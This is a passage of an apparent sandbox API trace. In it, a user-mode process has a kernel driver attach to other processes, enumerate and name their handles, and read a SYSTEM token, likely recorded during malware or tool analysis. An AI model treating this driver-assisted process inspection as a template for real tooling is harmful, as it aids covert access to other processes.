0x0 [0220.699] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.699] PsReleaseProcessExitSynchronization () returned 0x2 [0220.699] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.699] ObQueryNameString (in: Object=0xfffff8a001b25640, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.699] ObfDereferenceObject (Object=0xfffff8a001b25640) returned 0x1 [0220.699] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.699] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.699] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.699] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.699] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.699] PsAcquireProcessExitSynchronization () returned 0x0 [0220.700] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.700] ObReferenceObjectByHandle (in: Handle=0x4f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b31af0, HandleInformation=0x0) returned 0x0 [0220.700] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.700] PsReleaseProcessExitSynchronization () returned 0x2 [0220.700] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.700] ObQueryNameString (in: Object=0xfffff8a001b31af0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.700] ObfDereferenceObject (Object=0xfffff8a001b31af0) returned 0x1 [0220.700] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.700] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.700] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.700] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.700] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.700] PsAcquireProcessExitSynchronization () returned 0x0 [0220.700] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.700] ObReferenceObjectByHandle (in: Handle=0x504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b26f30, HandleInformation=0x0) returned 0x0 [0220.700] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.700] PsReleaseProcessExitSynchronization () returned 0x2 [0220.700] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.701] ObQueryNameString (in: Object=0xfffff8a001b26f30, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.701] ObfDereferenceObject (Object=0xfffff8a001b26f30) returned 0x1 [0220.701] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.701] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.701] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.701] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.701] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.701] PsAcquireProcessExitSynchronization () returned 0x0 [0220.701] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.701] ObReferenceObjectByHandle (in: Handle=0x50c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001bade00, HandleInformation=0x0) returned 0x0 [0220.701] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.701] PsReleaseProcessExitSynchronization () returned 0x2 [0220.701] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.701] ObQueryNameString (in: Object=0xfffff8a001bade00, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.701] ObfDereferenceObject (Object=0xfffff8a001bade00) returned 0x1 [0220.701] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.702] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.702] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.702] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.702] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.702] PsAcquireProcessExitSynchronization () returned 0x0 [0220.702] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.702] ObReferenceObjectByHandle (in: Handle=0x510, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001bde8a0, HandleInformation=0x0) returned 0x0 [0220.702] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.702] PsReleaseProcessExitSynchronization () returned 0x2 [0220.702] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.702] ObQueryNameString (in: Object=0xfffff8a001bde8a0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.702] ObfDereferenceObject (Object=0xfffff8a001bde8a0) returned 0x1 [0220.702] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.702] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.702] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.702] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.702] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.703] PsAcquireProcessExitSynchronization () returned 0x0 [0220.703] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.703] ObReferenceObjectByHandle (in: Handle=0x538, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001745540, HandleInformation=0x0) returned 0x0 [0220.703] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.703] PsReleaseProcessExitSynchronization () returned 0x2 [0220.703] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.703] ObQueryNameString (in: Object=0xfffff8a001745540, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.703] ObfDereferenceObject (Object=0xfffff8a001745540) returned 0x1 [0220.703] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.703] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.703] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.703] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0220.703] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.703] PsAcquireProcessExitSynchronization () returned 0x0 [0220.703] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880052b35d0) [0220.704] ObReferenceObjectByHandle (in: Handle=0x540, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001789ce0, HandleInformation=0x0) returned 0x0 [0220.704] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.704] PsReleaseProcessExitSynchronization () returned 0x2 [0220.704] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x79 [0220.704] ObQueryNameString (in: Object=0xfffff8a001789ce0, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.704] ObfDereferenceObject (Object=0xfffff8a001789ce0) returned 0x1 [0220.704] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.704] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0xc8 [0220.704] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0220.704] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80018b85a0, HandleInformation=0x0) returned 0x0 [0220.704] ObOpenObjectByPointer (in: Object=0xfffffa80018b85a0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800007c8) returned 0x0 [0220.705] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x71 [0220.705] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c8, DesiredAccess=0x8, TokenHandle=0xfffffa8001ec6500 | out: TokenHandle=0xfffffa8001ec6500*=0xc4) returned 0x0 [0220.705] ZwClose (Handle=0xffffffff800007c8) returned 0x0 [0220.705] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.705] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0220.705] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0220.708] CloseHandle (hObject=0xc4) returned 1 [0220.708] CloseHandle (hObject=0xc8) returned 1 [0220.708] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.708] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0220.708] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.708] PsAcquireProcessExitSynchronization () returned 0x0 [0220.708] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0) [0220.708] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003554cb0, HandleInformation=0x0) returned 0x0 [0220.709] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.709] PsReleaseProcessExitSynchronization () returned 0x2 [0220.709] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0220.709] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3508) returned 0x0 [0220.709] ObfDereferenceObject (Object=0xfffffa8003554cb0) returned 0x1 [0220.709] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.709] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.709] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.709] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0220.709] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.709] PsAcquireProcessExitSynchronization () returned 0x0 [0220.709] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0) [0220.709] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800294d590, HandleInformation=0x0) returned 0x0 [0220.709] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.709] PsReleaseProcessExitSynchronization () returned 0x2 [0220.709] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0220.709] ObQueryNameString (in: Object=0xfffffa800294d590, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.710] ObfDereferenceObject (Object=0xfffffa800294d590) returned 0x1 [0220.710] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.710] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.710] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.710] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0220.710] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.710] PsAcquireProcessExitSynchronization () returned 0x0 [0220.710] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0) [0220.710] ObReferenceObjectByHandle (in: Handle=0xcc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003589f20, HandleInformation=0x0) returned 0x0 [0220.710] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.710] PsReleaseProcessExitSynchronization () returned 0x2 [0220.710] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0220.710] ObQueryNameString (in: Object=0xfffffa8003589f20, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.710] ObfDereferenceObject (Object=0xfffffa8003589f20) returned 0x2 [0220.710] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.710] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.711] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.711] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0220.711] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.711] PsAcquireProcessExitSynchronization () returned 0x0 [0220.711] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0) [0220.711] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003589070, HandleInformation=0x0) returned 0x0 [0220.711] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.711] PsReleaseProcessExitSynchronization () returned 0x2 [0220.711] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0220.711] ObQueryNameString (in: Object=0xfffffa8003589070, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.711] ObfDereferenceObject (Object=0xfffffa8003589070) returned 0x1 [0220.711] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.712] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.712] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.712] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0220.712] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.712] PsAcquireProcessExitSynchronization () returned 0x0 [0220.712] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0) [0220.712] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036fb8d0, HandleInformation=0x0) returned 0x0 [0220.712] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.712] PsReleaseProcessExitSynchronization () returned 0x2 [0220.712] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0220.712] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0220.712] ObfDereferenceObject (Object=0xfffffa80036fb8d0) returned 0x1 [0220.712] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.713] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.713] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.713] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0220.713] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.713] PsAcquireProcessExitSynchronization () returned 0x0 [0220.713] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0) [0220.713] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003756a20, HandleInformation=0x0) returned 0x0 [0220.713] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.713] PsReleaseProcessExitSynchronization () returned 0x2 [0220.713] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0220.713] ObQueryNameString (in: Object=0xfffffa8003756a20, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.714] ObfDereferenceObject (Object=0xfffffa8003756a20) returned 0x2 [0220.714] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.714] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.714] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.714] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0220.714] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.714] PsAcquireProcessExitSynchronization () returned 0x0 [0220.714] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0) [0220.714] ObReferenceObjectByHandle (in: Handle=0x130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003766a50, HandleInformation=0x0) returned 0x0 [0220.714] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.714] PsReleaseProcessExitSynchronization () returned 0x2 [0220.714] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0220.714] ObQueryNameString (in: Object=0xfffffa8003766a50, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0220.715] ObfDereferenceObject (Object=0xfffffa8003766a50) returned 0x2 [0220.715] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0220.715] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0220.715] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0220.715] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0220.715] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0220.715] PsAcquireProcessExitSynchronization () returned 0x0 [0220.715] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880052b35d0) [0220.715] ObReferenceObjectByHandle (in: Handle=0x134, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003767ba0, HandleInformation=0x0) returned 0x0 [0220.715] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0220.715] PsReleaseProcessExitSynchronization () returned 0x2 